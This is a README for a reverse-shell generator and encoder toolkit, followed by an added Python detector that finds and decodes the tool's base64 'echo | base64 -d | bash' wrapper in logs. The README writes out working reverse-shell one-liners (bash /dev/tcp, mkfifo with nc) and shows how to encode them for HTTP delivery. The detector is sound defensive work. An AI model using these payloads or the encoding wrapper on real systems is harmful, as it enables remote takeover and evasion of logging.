Scripts for generating reverse shells, based mostly on PayloadsAllTheThings.
With one script you can generate one-line reverse shell payloads.
With the other script you can base64-encode a reverse shell payload where appropriate. The encoding takes bad characters into account for delivery channels such as HTTP (URL-friendly base64-encoded payloads).
I normally pipe the output of the one-liner into the encoder when appropriate.
The tools are 2 scripts:
- rs_oneliner.py: Mostly one-liner reverse shell generator, based on PayloadsAllTheThings
- rs_b64encode.py: Use it in combination with rs_oneliner.py when the payload is suitable (normally payloads meant to be executed in a bash context). With --echo it builds an echo <base64_encoded_payload> | base64 -d | bash construct, and with --echo and --url it URL-encodes the payload as well.
Minimal requirements to run:
git clone https://github.com/arale61/reverse_shells_tools.git
cd reverse_shells_tools
python ./rs_oneliner.py -h
python ./rs_b64encode.py -h
How I prefer to use it:
- I have my own local bin path where these scripts are copied and set as executables:
~/.local/bin/rs_oneliner.py
~/.local/bin/rs_b64encode.py
- This local bin path is added to my PATH environment variable in my .zshrc or .bashrc:
export PATH=$PATH:$HOME/.local/bin
- Then use them like any other executable on your PATH.
- Simple bash tcp reverse shell:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash
- Simple bash udp reverse shell:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash --udp
- Simple perl tcp reverse shell for windows:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --perl --win
- Pipe into rs_b64encode.py:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash | ./rs_b64encode.py
- Pipe into rs_b64encode.py and build the echo-decode construct:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash | ./rs_b64encode.py --echo
- Pipe into rs_b64encode.py, build the echo-decode construct and URL-encode it (url_quote_plus):
./rs_oneliner.py -i 127.0.0.1 -p 6161 --bash | ./rs_b64encode.py --echo --url
- Simple safe base64 encode:
./rs_b64encode.py -p 'bash -i >& /dev/tcp/127.0.0.1/6161 0>&1'
- Simple safe base64 encode and use echo decode construct:
echo 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 6161 >/tmp/f' | ./rs_b64encode.py --echo
# or
./rs_b64encode.py -p 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 6161 >/tmp/f' --echo
- Pipe with rs_oneliner.py:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --python | ./rs_b64encode.py
- Pipe with rs_oneliner.py and build the echo-decode construct:
./rs_oneliner.py -i 127.0.0.1 -p 6161 --perl | ./rs_b64encode.py --echo
- Pipe into rs_b64encode.py, build the echo-decode construct and URL-encode it (url_quote_plus):
./rs_oneliner.py -i 127.0.0.1 -p 6161 --phpsystem | ./rs_b64encode.py --echo --url
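The --echo and --echo --url output shown above is exactly what ends up in web-server or shell audit logs, so the same wrapper is what a defender needs to unwrap. The following Python detector is an added example and is not part of this repository: it matches the echo | base64 -d | bash construct in both raw and url_quote_plus form (raw is tried first, because unquote_plus would mangle a '+' inside raw base64), decodes the blob and flags the payloads listed on this page. The exact spacing the tool emits and the non-bash indicator strings are assumptions; the sample log lines are constructed.

```python
import base64
import binascii
import re
from typing import Optional
from urllib.parse import quote_plus, unquote_plus

# The wrapper rs_b64encode.py --echo builds; exact spacing/quoting is an assumption.
ECHO_DECODE_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=_-]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:/bin/)?(?:ba)?sh")
# Reverse-shell markers: the bash/netcat ones come from this page, the rest are assumed.
INDICATORS = ("/dev/tcp/", "/dev/udp/", "mkfifo", "nc ", "socket.socket", "fsockopen")

def b64decode_lenient(data: str) -> Optional[str]:
    """Decode standard or URL-safe base64, tolerating stripped padding."""
    padded = data + "=" * (-len(data) % 4)
    for decoder in (lambda s: base64.b64decode(s, validate=True), base64.urlsafe_b64decode):
        try:
            return decoder(padded).decode("utf-8", errors="replace")
        except (binascii.Error, ValueError):
            continue
    return None

def inspect_command(cmd: str) -> Optional[dict]:
    """Unwrap echo|base64 -d|bash and flag indicators. The raw form is tried before the
    url_quote_plus form (--url), because unquote_plus would mangle '+' in raw base64."""
    for url_encoded, candidate in ((False, cmd), (True, unquote_plus(cmd))):
        match = ECHO_DECODE_RE.search(candidate)
        decoded = b64decode_lenient(match.group(1)) if match else None
        if decoded is not None:
            hits = [ind for ind in INDICATORS if ind in decoded]
            return {"decoded": decoded, "indicators": hits, "url_encoded": url_encoded}
    return None

def scan_log(lines) -> list:
    """Return (line_number, finding) for every line carrying a wrapped reverse shell."""
    return [(n, r) for n, line in enumerate(lines, start=1)
            if (r := inspect_command(line)) and r["indicators"]]

def wrap_echo(payload: str) -> str:
    """Constructed imitation of the --echo output, used only to build sample input."""
    return "echo " + base64.b64encode(payload.encode()).decode() + " | base64 -d | bash"

# Constructed sample log lines (not real captures); payloads are the ones shown on this page.
BASH_PAYLOAD = "bash -i >& /dev/tcp/127.0.0.1/6161 0>&1"
NC_PAYLOAD = "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 6161 >/tmp/f"
SAMPLE_LOG = [
    "cmd=ls -la /var/www",                       # benign
    "cmd=" + wrap_echo(BASH_PAYLOAD),            # --echo form
    "cmd=" + quote_plus(wrap_echo(NC_PAYLOAD)),  # --echo --url form
]
```

Running scan_log(SAMPLE_LOG) reports lines 2 and 3 with their decoded payloads and matched indicators, while the benign line is ignored.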